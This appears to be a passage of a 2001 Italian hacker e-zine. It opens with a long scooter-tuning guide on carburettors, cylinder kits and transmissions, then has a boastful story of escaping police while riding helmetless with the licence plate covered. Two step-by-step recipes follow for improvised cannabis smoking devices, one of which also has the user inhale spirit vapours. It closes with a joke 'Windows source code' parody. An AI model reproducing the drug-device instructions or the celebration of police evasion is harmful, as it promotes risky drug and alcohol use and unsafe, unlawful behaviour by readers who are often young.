In collaborazione con Mikuni, leader nei carburatori per motori a due tempi da
competizione, i nostri tecnici hanno studiato vari modelli di carburatori creati
appositamente per scooter e moto tra cui:
TM24
Studiato appositamente per le competizioni e realizzato in lega leggera, ha la
valvola piatta e diffusore senza discontinuità di sezione. Lunghi studi hanno
portato all'eliminazione dei problemi derivanti dalle vibrazioni e dagli shock
inerziali causati da sobbalzi della moto o degli scooter in gara.
8)MOLLE CONTRASTO VARIATORE RACING
Due molle in pregiato acciaio al silicio per garantire un carico costante nel tempo.
Carico maggiorato del 16% e 30% rispetto alle molle originali.
9)COPERCHIO SCATOLA INGRANAGGI RACING "REPLICA NARDO'"
Coperchio scatola ingranaggi con astucci a rulli in sostituzione delle originali
boccole a strisciamento. Si riducono così gli attriti degli alberi che ruotano su
questi astucci a rulli. Il coperchio è completo di un astuccio a sfera, due astucci a
rulli, un paraolio ed una guarnizione di tenuta del coperchio stesso.
10)COPERCHIO TRASMISSIONE CON RAFFREDDAMENTO FORZATO "TURBO COOLER"
Questo particolare coperchio acconsente il raffreddamento forzato degli organi di
trasmissione, variatore e frizione. Ciò permette di abbassare la temperatura degli
organi sopra citati e del motore stesso, evitando così anomale usure e perdite
prestazionali generate dalle temperature troppo elevate. Vi è inoltre uno speciale
filtro in poliuretano espanso che garantisce la depurazione dell'aria in entrata.
11)CARBURATORE DELL'ORTO PHBG21
In collaborazione con la Dell'Orto, è stato realizzato questo nuovo carburatore,
per rendere facile ed ottimale il montaggio sugli scooter della serie Gilera e Piaggio.
È corredato di arrivo olio e comando depressore per arrivo benzina; inoltre ha un esclusivo
trattamento superficiale che lo protegge dalle aggressioni atmosferiche e dalle
conseguenti ossidazioni.
La facilità di applicazione è confermata dal fatto che le cassette ingresso aria (air-box)
non debbono essere modificate dall'originale.
In questo modo la taratura nei vari passaggi è ottimale. Viene commercializzato con e
senza comando starter.
12)CARBURATORI MIKUNI
In collaborazione con Mikuni, leader nei carburatori per motori a due tempi da competizione,
i nostri tecnici hanno studiato vari modelli di carburatori creati appositamente per
scooter e moto:
VM16
Aumenta del 77% l'area di passaggio nei confronti dell'originale, con ovvi vantaggi
prestazionali. Il carburatore è tarato in modo ottimale grazie ad un sofisticato metodo e
apparecchiature di prova rivoluzionarie; pertanto in ogni posizione di apertura gas,
si ha il corretto equilibrio benzina/aria (rapporto stechiometrico) che acconsentirà un
utilizzo pronto ed efficace in ogni situazione.
VM20
Questo carburatore aumenta di quasi tre volte l'area di passaggio nei confronti
dell'originale. Il VM20 ha un diffusore a forma ellittica. Sono stati creati i
relativi collettori elastici perfettamente intercambiabili con quelli di serie e
appositamente realizzati per assorbire le vibrazioni nocive al carburatore.
Sono realizzati in gomma ad altissimo nitrile che mantiene inaltera l'elasticità e
l'affidabilità nel tempo.
13)GRUPPO TERMICO 50cc BASE
Step 1: Gruppo termico base originale o gruppo termico 50cc più spinto (Top
Performance, Malossi, Polini Codice).
Step 2: Variatore racing - Cinghia rinforzata specifica - Correttore di coppia -
Frizione regolabile.
Step 3: Carburatore 16 o 17,5 mm. - Lamelle in carbonio da 0,25mm. - Filtro originale
senza tappo.
Step 4: Marmitta specifica per 50cc (Polini Traffic, Styl Tecnigas Quantum, Fabrizi
Racing 50cc
).
Step 5: Centralina ad anticipo fisso o variabile - Cavo candela e pipetta racing - Albero
motore.
Dopo aver fatto queste modifiche bisognerà tarare perfettamente il variatore scegliendo
l'appropriato peso dei rulli, la rigidità della molla di contrasto e la durezza delle
mollette della frizione. Bisognerà anche rifare la carburazione, che, se effettuata bene,
garantirà prestazioni di alto livello in qualunque condizione.
14)GRUPPO TERMICO 70cc BASE
Step 1: Gruppo termico 70cc 2 segmenti completo di testa (Polini Corsa, Malossi
in ghisa.
...ecc) - Rapporti secondari allungati.
Step 2: Variatore racing - Cinghia rinforzata - Correttore di coppia - Frizione regolabile.
Step 3: Carburatore 19 o 21 mm. - Valvola lamellare maggiorata -Collettore d'aspirazione
corto per aumentare la potenza massima anche se a scapito dell'erogazione - Filtro
dell'aria aperto tipo racing.
Step 4: Marmitta per 70cc (Arrow Kompress Lite, Giannelli NR-X, Malossi WildLion, Polini
For Race).
Step 5: Centralina ad anticipo fisso o variabile - Cavo candela e pipetta racing - Albero
motore.
Dopo aver fatto queste modifiche bisognerà tarare perfettamente il variatore
scegliendo l'appropriato peso dei rulli, la rigidità della molla di contrasto e
la durezza delle mollette della frizione. Bisognerà anche rifare la carburazione,
che, se effettuata bene, garantirà prestazioni di alto livello in qualunque condizione.
15)GRUPPI TERMICI 50cc E 70 cc TROFEO IN ALLUMINIO
Qui possiamo optare per soluzioni estreme, per avere il massimo delle prestazioni:
Step 1: Gruppo termico 50cc o 70cc trofeo in alluminio, pistone monofascia (Polini
Evolution 50cc o 70cc, Malossi MHR Team..ecc) - Rapporti primari e secondari
allungati (per il 50cc solo i secondari).
Step 2: Trasmissione completa trofeo con semipuleggia posteriore maggiorata e variatore
di racing.
Step 3: Carburatore 19, 24 o 25 mm. -Valvola lamellare maggiorata - Collettore
d'aspirazione corto per aumentare la potenza massima anche se a scapito dell'erogazione -
Filtro dell'aria racing.
Step 4: Marmitta ad espansione tipo trofeo (Polini Evolution 5 o 7, Malossi MHR,
marmitta artigianale studiata sul diagramma del proprio cilindro).
Step 5: Centralina ad anticipo fisso o variabile - Cavo candela e pipetta racing - Albero
motore.
Step 6 (facoltativo): Rimozione impianto elettrico - Rimozione batteria - Rimozione ruota
libera d'avviamento - Forare copricarter per passaggio dell'aria in modo da
rinfrescare la trasmissione.
Dopo aver fatto queste modifiche ......(vedi sopra)....
16)MARMITTE LEO VINCI "Z"
Proprio come uno scarico da pista, per esprimersi al meglio, richiede una adeguata
messa a punto del veicolo che consiste nella sostituzione dei rulli e delle molle
della trasmissione, che vengono forniti da LeoVince insieme allimpianto.
In questo modo si ottengono performance molto elevate, frutto di una accurata
progettazione, mirata ad ottimizzare quanto più possibile il passaggio dei gas
combusti, contenendo nel contempo la rumorosità entro unarea "legale".
Limpianto è composto da una espansione e da un terminale. Lespansione è
realizzata in acciaio speciale da 10/10 mm. La sua architettura è di tipo "aperto" a
doppia camera, con intercapedine rivestita di materiale fonoisolante e silenziatore a
scarico diretto.
Lesecuzione dellespansione ha guidato lo sviluppo del terminale, al fine di
garantire una ottimale fluidodinamica e un buon assorbimento della rumorosità.
E' dunque nato un elemento con struttura interna specifica in acciaio inox e
rivestimento esterno in carbonio e kevlar; presenta il montaggio alto e regala un
ulteriore tocco di cattiveria sportiva, che si aggiunge a quella comunicata dalla
verniciatura trasparente dellespansione, che lascia a vista tutte le lavorazioni.
"RS"
La linea RS offre larchitettura tipica della famiglia Hand Made,
con espansione cono controcono di grosse dimensioni e terminale sviluppato
specificamente. Cambiano materiali e lavorazioni. Lespansione è sempre costruita
in acciaio 10/10 mm con procedimenti manuali, ma è saldata tradizionalmente.
Il terminale utilizza lalluminio, con finitura esterna nero opaco e i due fondelli
al naturale, per un gradevole effetto grintoso che ben si abbina a quello della
verniciatura trasparente scelta per lespansione.
17)PER L ELABORAZIONE DI UNO SCOOTER
Nell'elaborazione di uno scooter 2 tempi è estremamente importante scegliere il tipo
di intervento da effettuare sul gruppo termico; se tenerlo di serie e modificare la
trasmissione ed altri particolari oppure montare un kit di cilindrata maggiore, con un
diagramma delle luci più spinto.
Questa scelta iniziale influenzerà poi le nostre scelte riguardo alla marmitta,
al carburatore, all'albero motore e a tutti quei particolari che vanno abbinati per
ottenere un risultato ottimale.
E' inutile e dannoso montare un gruppo termico racing con la marmitta di serie,
oppure abbinare un carburatore da 25mm con il 50cc originale.
Il primo intervento che si può effettuare sul gruppo termico di serie è impiegare una
testa con diverso disegno della camera di scoppio e squish calcolato e preparare il
cilindro, agendo su scarico, travasi, ribassare addirittura la base del cilindro ed
effettuando dei buchi nel pistone. La potenza aumenterà notevolmente e l'affidabilità
diminuirà sensibilmente. Oppure si potrà sostituire il gruppo termico 50cc standard con
un altro gruppo termico sempre 50cc in ghisa ma con diagramma delle luci più
spinto (Polini Codice). Un discorso a se meritano i 50cc trofeo, realizzati in alluminio,
con luce di scarico con traversino e luci di travaso molto alte: questi gruppi
termici hanno un diagramma esasperato e o possono funzionare bene se non con una
marmitta appositamente realizzata.
Se invece volete cambiare cilindrata, non avrete che l'imbarazzo della scelta,
potendo scegliere tra un notevole numero di kit 70cc, più o meno spinti, più o meno costosi.
In commercio sono disponibili gruppi termici con 5, 6 e addirittura 8 travasi, scarichi
sdoppiati, con luci booster supplementari o convenzionali.
Cercando la massima durata ed affidabilità, il massimo è rappresentato dai kit detti base,
ovvero quelli dotati di pistone con 2 fasce elastiche e luci basse, con scarico
ellittico convenzionale.
E' sempre meglio scegliere un kit completo di testa, più potente ed affidabile.
Se i gruppi termici base offrono un buon compromesso tra affidabilità e potenza, ma non
soddisfano a pie- no si può optare per i kit intermedi, quelli con diagramma leggermente
più spinto, ma con pistone sempre a 2 fasce: sono kit abbastanza semplici da mettere a punto,
che lavorano molto bene anche con la marmitta di serie, potenti ma affidabili.
Gruppo termico Top-Performances 2 Plus H2O in ghisa
Gruppo termico Polini Corsa 70cc in ghisa H2O
Gruppo termico Polini Corsa 70cc in ghisa, raffreddamento ad aria
Quelli che offrono le prestazioni migliori sono i kit trofeo, ma non sono molto
affidabili nel tempo, anche se la loro potenza è veramente elevata grazie al pistone
monofascia, alle luci molto alte (veramente esasperate) e al cilindro, fatto in alluminio.
18)GRUPPO TERMICO MALOSSI MHR 70cc ALLUMINIO H20
Il montaggio dei kit per motori a 2 tempi non presenta grosse difficoltà.
E' estremamente importante lavorare in un luogo pulito ed impiegare utensili di
buona qualità.
Il serraggio della testa, sui gruppi termici in alluminio è più critico rispetto a
quelli in ghisa ed è necessario, per evitare danni irreversibili, stringere i dadi
della testa con una piccola chiave dinamometrica.
I gruppi termici in ghisa offrono una buona affidabilità anche in condizioni gravose,
mentre quelli in alluminio sono più sensibili alle temperature elevate.
L'elemento di maggior importanza nella realizzazione di un'elaborazione di uno scooter
è sicuramente la scelta delle parti speciali della trasmissione e della loro messa a punto.
Il funzionamento della trasmissione automatica è abbastanza semplice, ma la sua messa a
punto richiede abilità ed esperienza. Queste trasmissioni si compongono di due pulegge
collegate da una cinghia dentata, una collegata all'albero motore, l'altra al mozzo
della ruota posteriore. A motore fermo la puleggia anteriore è completamente aperta e
la posteriore chiusa, in posizione di marcia corta; al salire dei giri del motore si
innesta la frizione centrifuga e le massette contenute all'interno della semipuleggia
mobile comincia- no a spostarsi al suo interno per forza centrifuga, facendola chiudere
ed inserendo così una marcia più lunga. Contemporaneamente la puleggia posteriore, per
via della trazione della cinghia dentata determinata dalla chiusura della puleggia
anteriore, comincia ad aprirsi vincendo il contrasto della molla in essa contenuta.
Questo spostamento della cinghia continua fino a che la puleggia anteriore si è
completamente chi- usa e la posteriore si è invece completamente aperta, inserendo
così la marcia più lunga e consentendo allo scooter di raggiungere la velocità massima.
In fase di rilascio del gas, la puleggia anteriore si riapre e la posteriore si
richiude, scalando così le marce.
Dopo aver descritto sinteticamente il funzionamento della trasmissione automatica,
possiamo analizzare i principi che regolano la sua messa a punto. I due interventi più
frequenti sono quelli che riguardano la variazione del peso delle massette e il carico
della molla di contrasto delle pulegge condotte. Con massette più pesanti il variatore
lavorerà ad un numero di giri più basso, con massette leggere ad un numero di giri più elevato.
Per un motore dotato di coppia ad un regime molto alto bisognerà tarare il variatore
con mas- sette leggere, massette più pesanti devono essere montate su motori dotati di
coppia ad un numero di giri più basso.
MASSETTE DI DIVERSA GRAMMATURA
Una molla di contrasto troppo tenera farà slittare ed affondare la
cinghia dentata, una molla troppo dura assorbirà molta potenza al motore,
penalizzerà le prestazioni dello scooter soprattutto in velocità massima e
penalizzerà anche la durata della cinghia.
20)MOLLE CONTRASTO POLINI
Per mettere a punto la trasmissione di uno scooter preparato bisogna
effettuare numerose prove, fino a trovare la molla di contrasto che con
il minor carico possibile eviti lo slittamento della cinghia, per poi trovare
il peso ottimale delle massette.
Molto importante è utilizzare massette realizzate con materiali di buona
qualità che resistano alle alte temperature senza danneggiarsi; stesso
discorso per le molle di contrasto.
L'innesto della frizione centrifuga dipende invece dalla durezza delle mollette
dei ceppi della frizione: mollette più dure faranno innestare la frizione ad un
numero di giri più elevato, e viceversa.
21)MOLLE FRIZIONE POLINI
Il correttore di coppia serve invece ad evitare il calo del motore poco dopo la
partenza (caratteristica di tutti i motori degli scooter), per tenere il motore
sempre in tiro e migliorare l'accelerazione.
22)CORRETTORE DI COPPIA POLINI SPEED DRIVER
La Malossi ha recentemente messo in commercio una trasmissione per motori
Minarelli e Piaggio denominata Over Range, caratterizzata da una dimensione
delle pulegge del variatore e delle puleggie condotte di coppia maggiore
rispetto alle originali, per avere una spaziatura dei rapporti molto più ampia.
I risulta- ti con un kit simile sono veramente eccezionali.
Su uno scooter, anche originale, offre un sensibile miglioramento delle prestazioni
la sostituzione del variatore originale con uno speciale ad ampia escursione, che,
grazie alla loro particolare spaziatura dei rapporti, offrono un miglioramento
dell'accelerazione e della velocità massima (5-7 Km/h).
23)VARIATORE POLINI SPEED CONTROL
Anche per le frizioni automatiche sono stati fatti enormi progressi, essendo
ora disponibili in commercio frizioni con molteplici possibilità di regolazione.
24)ALBERO MOTORE POLINI
L'albero motore svolge il delicato compito di trasformare in moto alternato del pistone
in moto circolare, fornendo così lavoro utilizzabile.
Nei motori 2 tempi l'albero motore deve essere conformato in modo da lasciare meno
spazio possibile in camera di manovella, al fine di aumentare la pressione dei gas
al suo interno ed ottenere un migliore riempimento del cilindro e, quindi, maggiore
potenza e coppia ai bassi regimi.
Gli alberi motore di serie, a differenza di quelli racing, presentano delle masse
volaniche decisamente più vuote e sottili. Ulteriori differenze tra gli alberi
motore racing e quelli di serie possono trovarsi a livello di bilanciamento, un
fattore che può influenzare in modo considerevole l'erogazione della potenza del
motore, il peso più contenuto della biella, la presenza di un cuscinetto di biella
racing con riporto in argento, un accoppiamento più serrato del perno.
Per i propulsori Minarelli trofeo vengono prodotti alberi motore con biella specifica
per pistone con spinotto da 12mm, decisamente più affidabile della versione 10mm di
serie su questi motori così spinti. Le ulti- me evoluzioni in questo campo hanno
spinto i tecnici alla realizzazione di alberi motore con bielle sensibilmente più
lunghe oppure realizzate in titanio. Ad esempio, la Malossi , sui propulsori
Minarelli tipo scooter cross, ha impiegato una biella interasse 85mm in luogo degli
80mm di quella di velocità, abbinandola ad un pistone più corto di 5mm, per avere
un'erogazione della potenza più corposa sin dai bassi regimi. La Polini, sempre per
i motori Minarelli, per avere un migliore riempimento agli alti regimi, penalizzando
i bassi, consiglia di barenare i carter motore in modo da aumentare il volume,
con una scelta tecnica inconsueta per la scuola duetempistica europea ma non per
quella giapponese.
Per aumentare la cilindrata, oltre ad aumentare l'alesaggio del pistone, si può
montare un albero motore con corsa più lunga: la Top Performance produce un albero
motore di corsa 40,2mm in luogo degli originali 39,2mm del propulsore Minarelli 50cc,
la Fabrizi addirittura un corsa 44mm, la Eurocilindro un 43mm; il Top Performance
si può abbinare a tutti i gruppi termici, i Fabrizi e gli Eurocilindro solo ai gruppi
termici specificamente realizzati.
Molto importante, in un motore da competizione, è la scelta dei cuscinetti di banco,
particolari troppo spesso trascurati.
E' molto importante avere esperienza per montare un albero motore, perché anche con un
minimo errore si rischia di danneggiare irreparabilmente l'albero motore stesso e il
gruppo termico
25)ALIMENTAZIONE
Per alimentazione intendo riferirmi a tutto il processo che porta
la benzina a miscelarsi con l'aria nel carburatore, per mezzo di una
valvola lamellare, all'interno dei carter motore. Fanno parte dell'impianto
di alimentazione il filtro dell'aria, il carburatore, il collettore d'aspirazione,
ed il pacco lamellare.
Il processo con il quale la benzina viene miscelata all'aria è relativamente semplice
ed è determinato dalla depressione del motore in fase di aspirazione, durante la salita
del pistone verso il punto morto superiore. Questa depressione all'interno del
carburatore , genera appunto la miscelazione di aria-benzina in rapporto 15/1.
La benzina viene risucchiata attraverso i getto del polverizzatore e miscelata
all'aria nel diffuso- re del carburatore.
E' ovvio che, un carburatore con diffusore di diametro più ampio garantirà un
passaggio di una quantità maggiore di benzina, incrementando così la potenza
del propulsore. Anche la conformazione del diffusore del carburatore può influenzare
l'erogazione della potenza del motore. Un carburatore a diffusore ellittico,
infatti assicura un'erogazione della potenza decisamente più fluida rispetto ad un
carburatore a diffusore circolare.
L'aria prima di arrivare al carburatore deve passare attraverso un filtro, per
essere privata di tutte le impurità sospese in essa e che potrebbero danneggiare
il motore. I filtri dell'aria possono essere di diverso tipo, ma devono svolgere
il loro compito opponendo il minor freno possibile al passare dell'aria e,
contemporaneamente, devono avere un ottimo potere filtrante. Sui veicoli
stradali il filtro dell'aria svolge anche l'importante compito di ridurre,
entro limiti accettabili, la rumorosità di aspirazione del motore.
Il carburatore è unito alla valvola lamellare, nei motori a 2 tempi, attraverso il
collettore d'aspirazione.
La valvola lamellare serve a controllare il flusso di miscela aria-benzina nel
carter motore. Nell'elaborazione di un motore l'impianto di alimentazione svolge una
funzione fondamentale e tutti i suoi componenti devono essere accordati fra loro,
con il gruppo termico e con l'impianto di scarico per poter garantire il massimo
delle prestazioni. E' quindi di fondamentale importanza abbinare nel migliore dei
modi filtro dell'aria, carburatore, collettore d'aspirazione e pacco lamellare con
le esigenze del gruppo termico e dell'impianto di scarico, considerando tutti i
componenti del motore come piccole parti di un grande insieme e come pezzi tra
loro indipendenti. Con un gruppo termico 50cc si potrà montare un carburatore da
16mm fino a 17,5mm, utilizzando la scatola filtro originale, senza il tappo posto
davanti al collettore di gomma che collega la scatola filtro al carburatore,
collettore di serie e lamelle in carbonio da 0,25 mm sul pacco lamellare originale.
Su un 70cc base e marmitta originale come sopra, con marmitta più aperta e performante,
si può montare un carburatore da 19-20-21mm, modificando il cassoncino d'aspirazione o
montando un filtro racing.
Con un motore trofeo 50cc o 70cc si può montare un carburatore da 19mm, seguendo
il regolamento del trofeo nazionale, abbinandolo ad un filtro di tipo aperto e ad
un collettore d'aspirazione più corto e rettilineo possibile per privilegiare la
potenza massima a scapito dell'erogazione, oppure, non dovendo partecipare a
competizioni sportive si può optare per un carburatore con diffusore 24mm o 25mm,
con un ulteriore incremento prestazionale. Le lamelle più adatte a questi carburatori
sono quelle in carbonio da 0,27-0,30mm abbinate ad un pacco lamellare maggiorate.
Queste lamelle devono offrire una resistenza molto bassa al passaggio al passaggio
della miscela, ma, allo stesso tempo devono chiudersi correttamente anche agli alti regimi.
Il miglior materiale per realizzare queste lamelle è il carbonio.
Sui motori 2 tempi l'impianto di scarico svolge una funzione molto importante ed è in
grado di influenzare in modo considerevole le prestazioni del motore, più di quanto può
avvenire su un 4 tempi. Infatti, sul 2 tempi, la marmitta, definita espansione, ha
il compito di incrementare il riempimento del motore e contemporaneamente, di far
rientrare all'interno del cilindro una parte dei gas freschi in uscita durante la fase
di travaso. Tutto questo fa si che una buona espansione possa migliorare in modo
sostanzioso le prestazioni di un motore 2 tempi.
26)MARMITTA POLINI FUNKY
Le marmitte realizzate per lo scootercross sono dicisamente diverse da quelle
per le gare di velocità, dato che in quest'ultimo tipo di competizioni si ricerca
maggiormente la potenza massima, mentre nel fuoristrada è privilegiata la ricerca
della potenza ai bassi regimi.
Nel caso in cui, per via di una caduta, l'espansione dovesse schiacciarsi, è necessario
ripararla o sostituirla, perché non sarebbe più in grado di lavorare correttamente.
Nelle marmitte ad espansione senza paratie interne bisogna tenere in perfetta
efficienza il silenziatore, per motivi di resa del motore in termini di potenza massima.
Molto importante è anche tenere pulita al suo interno la marmitta dai residui
carboniosi, che a lungo andare potrebbero intasarla e comprometterne le prestazioni.
Non bisogna sostituire il silenziatore con uno di marca diversa da quella della
marmitta, a meno che non sia stato realizzato proprio come ricambio specifico e le
sue dimensioni non siano identiche a quelle del pezzo di serie.
27)ELETTRONICA
I progressi compiuti in questo settore della tecnica motoristica ha permesso
un'evoluzione notevole nella funzionalità, nella semplicità e nell'incremento
della potenza del motore.
Con le nuove centraline elettroniche ed i captatori privi di puntine platinate si è
infatti arrivati ad un livello di affidabilità e prestazioni fino a pochi anni fa
inimmaginabile.
I propulsori degli scooter stradali sono dotati di impianti di accensione decisamente
validi, che, però, in presenza di un'elaborazione, possono mostrare alcuni limiti.
Le centraline racing reperibili sul mercato offrono un'accensione perfetta anche a
regimi di rotazione molto elevati, sia per quanto riguarda la durata che per la
qualità della scintilla. Il primo caso in cui bisogna sostituire la centralina è
quando in essa è presente un limitatore di giri (scooter Honda), che potrebbe
penalizzare le prestazioni dello scooter in velocità massima.
Le centraline elettroniche speciali si dividono in modelli ad anticipo fisso e
ad anticipo variabile; la differenza tra questi due tipi sta nel fatto che le prime
forniscono la scintilla sempre allo stesso punto di anticipo, le seconde invece,
grazie ad un chip elettronico, possono variare l'anticipo in base al regime di giri
del motore, ottimizzando ulteriormente la combustione. Le centraline ad anticipo
fisso sono più semplici da mettere a punto e sono meno costose, quelle ad anticipo
variabile offrono prestazioni nettamente superiori, ma sono più costose ed impegnative
da mettere a punto. L'ultima frontiera è rappresentata dalle centraline con eprom
modificabile, come le Malossi Digitronic Eprom, sicuramente una delle centraline
racing per scooter più evolute in senso assoluto.
E' molto importante, anche in questo caso, montare una centralina adatta al
livello di preparazione del motore, per evitare anche possibili malfunzionamenti
ed eventuali danni al gruppo termico.
Vi sono poi anche volani di accensione che, oltre un certo numero di giri, non
forniscono più corrente necessaria ad alimentare la centralina e, quindi, a
garantire una scintilla sufficientemente forte: per evitare questo tipo di
problemi sono state sviluppate centraline ad accensione alimentate dalla batteria
e non direttamente dal volano, con un vantaggio molto grande rispetto alle
centraline di vecchia concezione soprattutto agli alti regimi.
La centralina tipo racing deve essere impiegata con una bobina specifica per poter
essere sfruttata al massimo; proprio per questa ragione molto spesso le centraline
elettroniche sono vendute insieme a bobine con una capacità maggiore dell'originale.
Queste bobine speciali permettono l'uso di cavi candela di qualità superiore,
importantissimi ai fini della resa del motore in quanto non emettono segnali di
disturbo e garantiscono una conduzione ottimale.
La candela ha una notevole importanza sui motori elaborati, soprattutto 2 tempi,
in quanto deve essere sostituita abbastanza frequentemente per offrire sempre il
massimo delle prestazioni; anche la gradazione termica della candela deve essere
sempre corretta, quella secondo le indicazioni del costruttore del gruppo termico.
Una candela troppo calda potrebbe generare una temperatura eccessiva e danneggiare il
motore, mentre una candela troppo fredda potrebbe imbrattarsi anche con delle carburazioni
troppo magre, causando anche in questo caso la rottura del motore.
Eccoci giunti alla fine anche di questo articolo, spero che non vi abbia annoiato, cmq
non ci sono scritte stronzate è tutto vero e ci sono i migliori articoli che si possono
trovare sul mercato, scelti da me solo per voi...bene bene bene...
ThAnKs To: kEwl, avatar, sYn, Giada(ti amo), Christopher, Luciana, Flo, Sicond'ora,
ciucculatell, Sioux, i ragazzi dell Um crew, Prosciutto, Carminuccio, ghighetto,
Alessio u'surdat, Pompiere, FabbioOoO, Banana, Lino pallino, Agnello, Caterina, Graziella,
Mr Wolf, SPYRO, bakunin, gouranga, Adryana , smav and many more....
05/05/2001
-_-_-_-_-_-_-jrash@hackersat.com-_-_-_-_-_-_-_-_-_-_[Jrash°]
/===========================::=============================::=================/
/ /L'inseguimento 2 / phaet /
/===========================::=============================::=================/
INSEGUIMENTO (2)
La mia avventura inserita in questo fantastico Dn5 e' mooolto meno spettacolare di
quella capitata a jrash (sei un grande fra') ma molto piu' comune e modesta....
infatti se nn sono bravo come lui a montare sui motorini in questo passo mi sono
leggermente riscattato...!!! Una bella mattina (dico bella perke' nn si andava a
scuola) si doveva andare ad un cinema a vedere un film didattico e l'appuntamento
con i proff era davanti al cinema e si doveva arrivare con mezzi propri quindi
io ed un mio carissimo amico Nicola (Nicky resterai sempre con noi anke se i
proff ti hanno bocciato) abbiamo preso il mio scarabeo (da tutti
kiamato "phaet motor" kissa' perke'... =)) e ci siamo avviati.
All'altezza del vekkio stadio di salerno "Vestuti" una pattuglia della
police ci lampeggia e ci fa segno di accostarci poike' eravamo senza
casco...(casco...??!! what is this??!!) ma.....e' proprio il caso di dirlo...
COL CAZZO KE CI FERMIAMO...!!! e l'inseguimento comincia con Nicky ke con un
piede copre la targa e scappiamo a tutta velocita' (si fa per dire essendo il
mio mezzo NON truccato 75h) nel traffico e l'auto dei figli di puttana
comincia ad accendere e spegnere le sirene, suonarci col clacson, ma per
nostra fortuna un ragazzo ke guidava un trerruote (APE CAR DELLA PIAGGIO)
si accosta per farci passare ma appena passati si rimette in mezzo alla
strada rallentando di molto e facendoci segno di passare,
noi dopo ci buttiamo dietro un vicolo dove nascondiamo il motorino sotto
un auto parkeggiata e noi facciamo finta di parlare tranquillamente mentre
la police passa e nn ci vede.....RAGA KE RACCONTO ALTRO KE JRASH!!!
CON IL SUO SI SAREBBE CAGATO ADDOSSO PURE SUPERMAN!!!
/===========================::=============================::=================/
/ /Il secchio / phaet /
/===========================::=============================::=================/
IL SECCHIO
Ecco un buon metodo per suicidarsi e per vedere due volte il paradiso!!!
(me so appena fatto un bel solitario.....) cmq torniamo a noi (ahe' mo e' un po
difficileeeee.......)
INGREDIENTI
1 sekkio
1 bottiglia di plastica
1 acqua
1 canna
1 coltello (io col cacciavite me trovo meglio)
1 gomma da masticare
2 polmoni davvero straordinari
PREPARAZIONE
Riempire il sekkio con l'acqua lasciando 5 cm dall'orlo, tagliare il
culo della bottiglia per 5 cm (solo il culo mi raccomandooooooo).
Bucare il tappo con il coltello e praparare la canna (vedi Dn #4),
mettere la canna con il filtrino rivolto verso il basso nel buco ke
avete fatto nel tappo e visto ke bisogno kiuderlo ermeticamente attaccare la
gomma intorno al buco nel tappo in modo ke nn passi aria e nn cada la canna!
mettere poi la bottiglia nel sekkio e spingerla fino in fondo attenti pero' ke
nn arrivi fino al buco per il tappo... mettere il tappo e accendere la canna!
COME SI FUMA
Lasciate ora ke la bottiglia risalga molto lentamente e ke il fumo entri
nella bottiglia, poi levate il tappo e rispiongete la bottiglia nel sekkio e
lasciate ke tutto il fumo entri nei nostri polmoni e resterete allibbiti dallo sballo.
COSA FUMO?
Il problema nn e' cosa fumo ma COME fumo: cioe' in poke parole quando ci si fa una
semplice canna con gli amici il fumo entra prima nella bocca e poi per un atto di
aspirazione ce lo scendiamo nei polmoni, invece con questo metodo il fumo ha una
spinta dal basso 3 volte maggiore di quando si fuma normalmente e il fumo resta
pokissimo nella nostra bocca poike' subito scende....pero' c'e' un contro a questo
tipo di metodo infatti la canna finisce dopo massimo 3 tiri ke si fa dalla bottiglia
perke' entra piu' aria!!
RAGA VI SCONSIGLIO VIVAMENTE DI FARVI UN SOLITARIO COSI' OPPURE SE SIETE COSI' MATTI
DA FARLO NN FATE IL MIO NOME PLSSSSS!!!
/===========================::=============================::=================/
/ /Il veliero / phaet /
/===========================::=============================::=================/
IL VELIERO
E rieccomi nella sezione narcoting dove metteremo diversi modi per fumare tra
cui questo veliero (e' sempre il mio preferito)!! l'ultima volta ci stavo
rimanendo secco visto ke l'ho fatto provare a dei ragazzini ke si sono
cagati in mano e ho dovuto fumarmelo quasi solo io ed era tutto a base di afghano!!!
partiamo subito con la descrizione del suddetto.......
INGREDIENTI
1 bottiglia di plastica (va benone quella della ferrarelle)
1 bottiglia vodka/gin/rum qualsiasi tipo di superalcolico
3 canne di qualsiasi qualita' (3 canne per 4 persone min.)
1 sigaretta
1 accendino/fiammiferi/draghi/pietre focaie/fulmini
2 polmoni ben allenati
PREPARAZIONE
Eccoce qua... allora svuotate la bottiglia dell'acqua ke contiene e inserite
il superalcolico ke avete in casa o a portata di mano (eviterei la birra....poco alcolico)
fino ad arrivare alla base dell'etiketta grande della marca dell'acqua....
poi strappate l'etiketta e mettete da parte la bottiglia...preparate le canne (Dn #4)....
prendete nuovamente la bottiglia e accendete la sigaretta con l'accendino e fate
tre fori con la sigaretta dove volete (fateli pero' sullo stesso lato in modo ke
quando fumate nn cada alcool) e mettete le tre canne nei fori con i filtrini
rivolti all'indentro e accendete le canne una per volta!!!!
COME SI FUMA
Prendete la bottiglia e tenetela orizzontalmete alla vostro bocca con le canne
rivolte verso l'alto e cominciate a fumare dalla bocca della bottiglia e
fate tiri molto piccoli dopo ke le canne stanno per finire toglietele dalla
bottiglia e fumatevele come cristo comanda!!
COSA FUMO?
Con questo metodo oltre al fumo delle 3 canne (e gia' questo basta per
mandarvi "a capa all'aria") aspirate anke i vapori dell'alcool e
immaginatevi ke succede. ALTERNATIVA: vi potete pure bere quello ke c'e'
nella bottiglia se nn avete fatto un macello con i mix di superalcoolici
PAOLINOOOOO.......FALLA GIRARE STA' CAZZO DI CANNA.....!!!!
Sir phaet (conte della canna persa) byeeee
/===========================::=============================::=================/
/ /Sorgenti di Windows! / Ghent /
/===========================::=============================::=================/
/*>> > TOP SECRET Codice della Microsoft(c)
Progetto: Chicago(tm)
Data di rilascio del progetto: estate 1998
*/
#include "win31.h"
#include "win95.h"
#include "robavecchia.h"
#include "billseifico.h"
#define INSTALL HARD
char fai_finta_di_essere_enorme[1600000];
void main()
{
while(!CRASHATO)
{
visualizza_messaggio_copyright();
visualizza_messaggio_bill_sei_fico();
ciclo_inutile();
if (prima_installazione)
{
fai_uno_swap_da_500_mega();
ciclo_inutile();
mettilo_in_culo_al_file_system_HPFS();
distruggi_OS/2();
impalla_il_sistema();
}
scrivi_una_cazzata(qualsiasi_cosa);
visualizza_messaggio_copyright();
ciclo_inutile();
fai_qualcosa();
if (non_ancora_in_crash)
{
visualizza_messaggio_copyright();
ciclo_inutile();
lancia_windows_3.1_con_interfaccia_fica();
ciclo_inutile();
ciclo_inutile();
}
}
if (individui_la_cache())
disabilita_la_cache();
if (processore_veloce())
{
imponi_enormi_stati_di_attesa(un_casino);
set_mouse(velocità, molto_lenta);
set_mouse(azione, a_canguro);
set_mouse(reazione, ogni_tanto);
}
